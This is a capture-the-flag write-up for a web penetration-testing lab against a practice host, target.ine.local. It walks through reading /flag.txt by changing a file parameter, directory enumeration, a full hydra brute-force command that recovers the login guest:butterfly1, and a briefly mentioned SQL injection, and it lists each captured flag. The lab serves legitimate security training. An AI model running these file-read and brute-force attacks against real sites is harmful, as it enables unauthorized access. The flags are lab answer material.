Web Application Penetration Testing CTF 1
Overview¶
Web Application Penetration Testing is a critical process in identifying and exploiting vulnerabilities within web applications to assess their security posture. This type of testing simulates real-world attacks to uncover weaknesses such as SQL Injection, Cross-Site Scripting (XSS), Local File Inclusion (LFI), and others that could be exploited by malicious actors. Penetration testers use a combination of automated tools and manual techniques to probe the application for vulnerabilities, validate their impact, and suggest mitigation strategies. By performing these tests, organizations can identify potential security flaws before they are exploited by attackers, ensuring the integrity and confidentiality of sensitive data and safeguarding the application from future threats.
This lab is designed to test your knowledge and skills in identifying web application vulnerabilities and uncovering hidden information on a target web server.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.
Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.
Useful wordlists:
/usr/share/wordlists/dirb/common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
Writeup¶
Flag 1¶
Sometimes, important files are hidden in plain sight. Check the root ('/') directory for a file named 'flag.txt' that might hold the key to the first flag.
The target is: http://target.ine.local
On this website, we can see some files. The url of this viewer is: http://target.ine.local/view_file?file=file1.txt. Just change file.txt with /flag.txt
FLAG1_5c50a28853064c69be90a268498a955c
Flag 2¶
Explore the structure of the server's directories. Enumeration might reveal hidden treasures.
Let's enumerate it using dirbuster:
Dir found: / - 200
File found: /login - 200
File found: /about - 200
File found: /view_file - 200
Dir found: /secured/ - 200
In the folder secured there is a flag.txt file.
FLAG2_f4116b6c0409404ea27e62b790a6f417
Flag 3¶
The login form seems a bit weak. Trying out different combinations might just reveal the next flag.
Let's go on login page. Let's use these wordlists to bruteforce a user:
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/root/Desktop/wordlists/100-common-passwords.txt
I use hydra, using the http-post-form and excluding the error Invalid username or password:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /root/Desktop/wordlists/100-common-passwords.txt \
target.ine.local http-post-form \
"/login:username=^USER^&password=^PASS^:Invalid username or password" \
-f -V
[80][http-post-form] host: target.ine.local login: guest password: butterfly1
[STATUS] attack finished for target.ine.local (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-25 16:40:56
Logging with guest:butterfly1 we can find the third flag:
FLAG3_0dabb1ebdb6240e1864aa0265f06f3ee
Flag 4¶
The login form behaves oddly with unexpected inputs. Think of injection techniques to access the 'admin' account and find the flag.
I tried to put some chat in password field and it gave me Internal Server Error. Good news, it can be a SQLi. Using Burpsuite I tried some combinations. This simple combination works
FLAG4_7d55199cd331470db7ba3449844dc834